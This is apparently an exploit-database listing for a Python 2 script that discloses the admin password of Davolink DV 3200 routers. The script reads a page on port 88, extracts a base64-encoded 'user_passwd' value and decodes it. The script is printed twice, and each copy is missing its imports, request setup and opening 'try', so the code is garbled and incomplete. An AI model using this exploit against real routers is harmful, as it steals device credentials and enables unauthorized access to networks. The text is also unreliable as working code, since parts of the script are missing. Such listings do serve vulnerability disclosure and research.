Exploits / Vulnerability Discovered : 2018-07-23 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Davolink dvw 3200 router password disclosure is for educational purposes only and if it is used you will do on your own risk!
# Many Davolink Davolink DV 3200 devices credentials can be disclosed using the following script.
# Author : Ankit Anubhav (ankitanubhav.com) of NewSky Security ( https://www.newskysecurity.com/ )
# Usage script.py 1.3.3.7 where 1.3.3.7 is the Davolink DV 3200 IP.
# Use responsibly only for research and testing purposes.
# Tested with python 2.7
if (connection_check == "200"):
html = urllib2.urlopen(req).read()
str_html = str(html)
m=re.compile('var user\_passwd\=\"(.*?)\"').search(str_html)
encoded_pwd =str(m.group(1))
actual_pwd = base64.b64decode(encoded_pwd)
print "**************************************************************************************************"
print "The password for the Davolink device is " + actual_pwd
print "**************************************************************************************************"
else:
print "Connection to port 88 was not successful. Cant find credentials,sorry."
except:
print "There was an error in connecting to the IP."
# Many Davolink Davolink DV 3200 devices credentials can be disclosed using the following script.
# Author : Ankit Anubhav (ankitanubhav.com) of NewSky Security ( https://www.newskysecurity.com/ )
# Usage script.py 1.3.3.7 where 1.3.3.7 is the Davolink DV 3200 IP.
# Use responsibly only for research and testing purposes.
# Tested with python 2.7
if (connection_check == "200"):
html = urllib2.urlopen(req).read()
str_html = str(html)
m=re.compile('var user\_passwd\=\"(.*?)\"').search(str_html)
encoded_pwd =str(m.group(1))
actual_pwd = base64.b64decode(encoded_pwd)
print "**************************************************************************************************"
print "The password for the Davolink device is " + actual_pwd
print "**************************************************************************************************"
else:
print "Connection to port 88 was not successful. Cant find credentials,sorry."
except:
print "There was an error in connecting to the IP."